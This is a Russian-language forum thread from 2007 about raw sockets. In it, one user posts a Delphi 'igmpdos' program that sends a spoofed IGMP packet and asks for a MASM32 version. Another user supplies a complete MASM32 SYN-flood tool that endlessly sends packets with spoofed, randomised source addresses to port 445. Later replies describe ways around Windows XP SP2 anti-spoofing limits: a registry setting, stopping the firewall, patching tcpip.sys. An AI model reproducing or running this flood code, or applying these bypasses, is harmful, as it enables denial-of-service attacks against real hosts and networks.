RAW_SOCK

Devill · 11 дек 2007

Помогите пожалуйста перевести на masm32

Код (Text):

program igmpdos;

uses

Windows,

WinSock2;

type

TIPHeader = packed record

VerLen: Byte;

ToS: Byte;

TotalLen: WORD;

UID: WORD;

Flags: WORD;

TTL: Byte;

Protocol: Byte;

ChkSum: WORD;

SourceIP: DWORD;

DestIP: DWORD;

Options: array [0..1] of WORD;

end;

TIGMPHeader = packed record

pType: Byte;

Code: Byte;

ChkSum: WORD;

Group: DWORD;

Resv: Byte;

QQIC: Byte;

Num: WORD;

addes: DWORD;

end;

TWordAr = array [0..0] of WORD;

PWordAr = ^TWordAr;

function ChkSum(pData: PWordAr; Size: DWORD): WORD;

var

res: DWORD;

i: Integer;

begin

res := 0;

i := 0;

while (size > 1) do

begin

res := res + pData[i];

size := size - 2;

inc(i);

end;

if (size = 1) then res := res + pData[i];

res := (res shr 16) + (res and $FFFF);

res := res + (res shr 16);

result := WORD(not res);

end;

procedure SendFuckIGMP(DestIP, SorceIP: DWORD);

var

WSAData: TWSAData;

Sock: TSocket;

SockIn: TSockAddrIn;

flag: DWORD;

IpHdr: TIPHeader;

IgmpHdr: TIGMPHeader;

Buffer: Pointer;

begin

WSAStartup($202, WSAData);

Sock := WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, nil, 0, 1);

flag := 1;

setsockopt(Sock, IPPROTO_IP, IP_HDRINCL, @flag, 4);

ZeroMemory(@SockIn, sizeof(SockIn));

SockIn.sin_family := AF_INET;

SockIn.sin_port := htons(99);

SockIn.sin_addr.S_addr := DestIP;

ZeroMemory(@IpHdr, sizeof(IpHdr));

with IpHdr do

begin

VerLen := 64 + sizeof(IpHdr) div 4;

TotalLen := htons(sizeof(IpHdr) + sizeof(IgmpHdr));

TTL := 128;

Protocol := IPPROTO_IGMP;

SourceIP := SourceIP;

DestIP := DestIP;

end;

ZeroMemory(@IgmpHdr, sizeof(IgmpHdr));

with IgmpHdr do

begin

pType := 17;

Code := 5;

Num := htons(1);

addes := DestIP;

end;

flag := sizeof(IpHdr) + sizeof(IgmpHdr) + 4;

Buffer := GetMemory(flag);

ZeroMemory(Buffer, flag);

CopyMemory(Buffer, @IgmpHdr, sizeof(IgmpHdr));

IgmpHdr.ChkSum := ChkSum(Buffer, sizeof(IgmpHdr));

CopyMemory(Buffer, @IpHdr, sizeof(IpHdr));

CopyMemory(Pointer(DWORD(Buffer) + sizeof(IpHdr)), @IgmpHdr, sizeof(IgmpHdr));

IpHdr.ChkSum := htons(ChkSum(Buffer, sizeof(IpHdr) + sizeof(IgmpHdr)));

CopyMemory(Buffer, @IpHdr, sizeof(IpHdr));

sendto(sock, Buffer^, sizeof(IpHdr) + sizeof(IgmpHdr), 0, SockIn, sizeof(SockIn));

FreeMemory(Buffer);

closesocket(Sock);

WSACleanup;

end;

begin

SendFuckIGMP(inet_addr('192.168.9.160'), inet_addr('10.0.3.1'));

end.

UnW1n · 11 дек 2007

структуры свои впихаеш тока

Код (Text):

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.686

.model flat, stdcall

option casemap :none

include libs\inc\windows.inc

include libs\inc\masm32.inc

include libs\inc\urlmon.inc

include libs\inc\kernel32.inc

include libs\inc\msvcrt.inc

include libs\inc\user32.inc

include libs\inc\shell32.inc

include libs\inc\advapi32.inc

include libs\inc\ws2_32.inc

include libs\inc\base64.inc

include libs\inc\Strings.mac

include libs\inc\getseg.inc

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

includelib libs\lib\shell32.lib

includelib libs\lib\base64.lib

includelib libs\lib\advapi32.lib

includelib libs\lib\msvcrt.lib

includelib libs\lib\masm32.lib

includelib libs\lib\urlmon.lib

includelib libs\lib\kernel32.lib

includelib libs\lib\wininet.lib

includelib libs\lib\ntdll.lib

includelib libs\lib\user32.lib

includelib libs\lib\ws2_32.lib

includelib libs\lib\getseg.lib

sfTCPHEADER STRUCT

tcp_src_port    WORD    ?

tcp_det_port    WORD ?

tcp_seq DWORD ?

tcp_ack DWORD ?

tcp_len BYTE    ?

tcp_flags BYTE    ?

tcp_window WORD    ?

tcp_cksum WORD    ?

tcp_urg_ptr WORD ?

sfTCPHEADER ENDS

sfIPHEADER STRUCT

h_verlen BYTE ?

ip_tos BYTE ?

total_len WORD ?

ident WORD ?

ip_off WORD ?

ip_ttl BYTE ?

ip_p BYTE ?

ip_cksum WORD ?

ip_src DWORD ?

ip_dest DWORD ?

sfIPHEADER ENDS ;20 bytes

PSDHEADER STRUCT

src_addr    DWORD ?

dst_addr    DWORD ?

zero BYTE ?

protocol BYTE    ?

ps_len    WORD    ?

PSDHEADER ENDS ;12 bytes

dwThreadID DWORD ?

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.code

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

start:

PUSh offset wsa

PUSh 00000202H

CALL WSAStartup

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

PUSh offset dwThreadID

PUSh 0

PUSh offset httpstruct

PUSh offset dns_thread

PUSh 0

PUSh 0

CALL CreateThread

invoke Sleep, 600000

invoke ExitProcess,0

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

COPY_MEMROY:

CopyMemory proc uses eax ecx esi edi dwDestination:dword, dwSource:dword, dwLen: dword

MOV esi, dwSource

MOV edi, dwDestination

MOV ecx, dwLen

.repeat

movsb

.untilcxz

RET

CopyMemory endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

;::::::::::::::CHKSUM FUNCTION

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

CHKSUM_FUNCTION:

checksum proc uses ecx esi edx, pData:dword, SzData:dword

MOV esi, 0

@@:

CMP SzData, 1

JLE @f

MOV eax, pData

XOR ecx, ecx

MOV cx, [eax]

MOV edx, esi

ADD edx, ecx

MOV esi, edx

MOV eax, pData

ADD eax, 2

MOV pData, eax

MOV ecx, SzData

SUB ecx, 2

MOV SzData, ecx

JMP @b

@@:

CMP SzData, 0

JZ    @f

MOV edx, pData

XOR eax, eax

MOV al, [edx]

MOV ecx, esi

ADD ecx, eax

MOV esi, ecx

@@:

MOV edx, esi

SHR edx, 10h

MOV eax, esi

AND eax, 0FFFFh

ADD edx, eax

MOV esi, edx

MOV ecx, esi

SHR ecx, 10h

MOV edx, esi

ADD edx, ecx

MOV esi, edx

MOV eax, esi

NOT eax

RET

checksum endp

SYN_THREAD:

syn_thread proc uses ecx, lParam:DWORD

LOCAL @dwFlag :DWORD

local addr_in :sockaddr_in

local ipHeader :sfIPHEADER

local tcpHeader :sfTCPHEADER

local psdHeader :PSDHEADER

LOCAL szSendBuf[60]:BYTE

PUSh 1

PUSh 0

PUSh NULL

PUSh IPPROTO_RAW

PUSh SOCK_RAW

PUSh AF_INET

CAll WSASocket

MOV edi,eax

.if edi==INVALID_SOCKET ;

RET ;if(sock==INVALID_SOCKET) return false;

.endif

MOV @dwFlag, TRUE

PUSh sizeof @dwFlag

LEA eax, @dwFlag

PUSh eax

PUSh 2

PUSh IPPROTO_IP

PUSh edi

CAll setsockopt

.if eax == SOCKET_ERROR ;if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL,

RET ;(char*)&flag, sizeof(flag))==SOCKET_ERROR)

.endif

MOV addr_in.sin_family,AF_INET ;addr_in.sin_family=AF_INET

MOV ax, 445

bswap eax

ror eax,10h

MOV addr_in.sin_port, ax

PUSh $CTA0("192.168.1.33")

CALL gethostbyname

.if eax!=0

MOV eax, [eax+0ch]

MOV eax, [eax]

MOV eax, [eax]

MOV addr_in.sin_addr, eax

.endif

MOV byte ptr [ipHeader.h_verlen],45h

MOV eax, 28h

bswap eax

ror eax,10h

MOV word ptr [ipHeader.total_len],ax

MOV ipHeader.ident, 1

MOV ipHeader.ip_off, 0

MOV ipHeader.ip_ttl, 80h

MOV ipHeader.ip_p, 6h

MOV ipHeader.ip_cksum, 0

MOV eax,dword ptr [addr_in.sin_addr]

MOV dword ptr [ipHeader.ip_dest],eax

MOV eax, 445

bswap eax

ror eax,10h

MOV word ptr [tcpHeader.tcp_det_port],ax

MOV byte ptr [tcpHeader.tcp_len],50h

MOV eax, 4000h

bswap eax

ror eax,10h

MOV word ptr [tcpHeader.tcp_window],ax

MOV tcpHeader.tcp_urg_ptr , 0

MOV ecx,dword ptr [ipHeader.ip_dest]

MOV dword ptr [psdHeader.dst_addr],ecx

MOV psdHeader.zero, 0

MOV psdHeader.protocol, 06h

MOV eax, sizeof tcpHeader

bswap eax

ror eax,10h

MOV psdHeader.ps_len, ax

MOV ipHeader.ip_tos,24h

.while(1)

PUSH 1

CALL Sleep

;***************************************************************************************************************************

;Make a Syn Packet

;***************************************************************************************************************************

MOV tcpHeader.tcp_ack, 0

MOV tcpHeader.tcp_flags, 02h ;SYN

MOV tcpHeader.tcp_cksum, 0

RDTSC

MOV dword ptr [ipHeader.ip_src],eax

RDTSC

MOV word ptr [tcpHeader.tcp_src_port],ax

push eax

RDTSC

MOV dword ptr [tcpHeader.tcp_seq],eax

mov esi, eax

push esi

MOV ecx,dword ptr [ipHeader.ip_src]

MOV dword ptr [psdHeader.src_addr],ecx

PUSh sizeof psdHeader

LEA eax, psdHeader

PUSh eax

LEA eax, szSendBuf

PUSh eax

CAll CopyMemory

PUSh sizeof tcpHeader

LEA eax, tcpHeader

PUSh eax

LEA eax, szSendBuf

ADD eax, sizeof psdHeader

PUSh eax

CAll CopyMemory

PUSh sizeof psdHeader + sizeof tcpHeader

LEA eax, szSendBuf

PUSh eax

CAll checksum

MOV tcpHeader.tcp_cksum, ax

PUSh sizeof ipHeader

LEA eax, ipHeader

PUSh eax

LEA eax, szSendBuf

PUSh eax

CAll CopyMemory

PUSh sizeof tcpHeader

LEA eax, tcpHeader

PUSh eax

LEA eax, szSendBuf

ADD eax, sizeof ipHeader

PUSh eax

CAll CopyMemory

PUSh 4

PUSh 0

LEA eax, szSendBuf

ADD eax, sizeof ipHeader + sizeof tcpHeader

PUSh eax

CAll crt_memset

PUSh sizeof ipHeader + sizeof tcpHeader

LEA eax, szSendBuf

PUSh eax

CAll checksum

MOV ipHeader.ip_cksum, ax

PUSh sizeof ipHeader

LEA eax, ipHeader

PUSh eax

LEA eax, szSendBuf

PUSh eax

CAll crt_memcpy

PUSh sizeof addr_in

LEA eax, addr_in

PUSh eax

PUSh 0

PUSh sizeof ipHeader + sizeof tcpHeader

LEA eax, szSendBuf

PUSh eax

PUSh edi

CAll sendto

.endw

RET

syn_thread endp

RET 0

end start

Devill · 11 дек 2007

спасибо !

sl0n · 12 дек 2007

эта яхня не будет работать на сп2 если спуфить айпи, там в тцпип блок стоит -))

Cr4sh · 12 дек 2007

sl0n сказал(а):

эта яхня не будет работать на сп2 если спуфить айпи, там в тцпип блок стоит -))
Нажмите, чтобы раскрыть...

Выставить HKLM\SYSTEM\CurrentControlSet\Services\Afd\Parameters\DisableRawSecurity в 0, и всё будет ок. Но спуфить адрес отправителя в IP-пакетах не есть гуд, потому как нет гарантии, что такой пакет выйдет за пределы маршрутизатора.

kaspersky · 13 дек 2007

Cr4sh
она еще и с компьютера никуда не уйдет
а если еще и стоит MS05-019, то это вааще.

в XP SP2 мы имеем следующий перечень ограничений
(подробнее см, http://technet.microsoft.com/en-us/library/bb457156.aspx):

q TCP-пакеты не могут быть посланы через сырые сокеты;
q UDP-пакеты с "левым" адресом источника дропаются системой;

Server 2003 и Server 2008 полностью поддерживают сырые сокеты,
но: только после остановки встроенного брандмауэра,
что осуществляется командой "net stop alg",

а вообще, ситуация такая:
NT 4.0 сырые сокеты ограничены 10 входящими соединениями за 10 минут (лечится правкой реестра);
W2K полностью поддерживает сырые сокеты;
XP SP0 полностью поддерживает сырые сокеты после остановки брандмауэра ("net stop sharedaccess");
XP SP1 _без_ заплатки MS05-019 поддерживает сырые сокеты так же, как и XP SP0;
XP SP1 _с_ заплаткой MS05-019 блокирует исходящие сырые TCP-сокеты, если брандмауэр _запущен_
XP SP2 _без_ MS05-019 полностью поддерживает входящие сырые сокеты и частично исходящие;
XP SP2 _с_ заплаткой MS05-019 полностью поддерживает входящие сырые сокеты и некоторые исходящие;
Server 2003 полностью поддерживает сырые сокеты после остановки брандмауэра ("net stop alg");
Mac OS X полностью поддерживает сырые сокеты;
Linux полностью поддерживает сырые сокеты;
xBSD полностью поддерживает сырые сокеты;

sl0n · 13 дек 2007

ну можно просто пропатчить тцпип.сис

kaspersky · 13 дек 2007

sl0n
или использовать winpcap

droopy · 20 янв 2008

Хм... наконец-то нашел почему не могу отправить RAW UDP с не своим адресом)). Оказывается дело в WinXPSP2.
Попробовал просто заменить tcpip.sys на такой же с WinXPSP1. Но это не прошло - при загрузке появляется BlueScreenOfDeath.
Кто знает в чем причина? Может просто заменить еще какие-то модули?

Войти или зарегистрироваться

RAW_SOCK

Devill New Member

UnW1n New Member

Devill New Member

sl0n Мамонт дзена **

Cr4sh New Member

kaspersky New Member

sl0n Мамонт дзена **

kaspersky New Member

droopy New Member

Войти или зарегистрироваться

RAW_SOCK

Devill New Member

UnW1n New Member

Devill New Member

sl0n Мамонт дзена **

Cr4sh New Member

kaspersky New Member

sl0n Мамонт дзена **

kaspersky New Member

droopy New Member

Быстрый поиск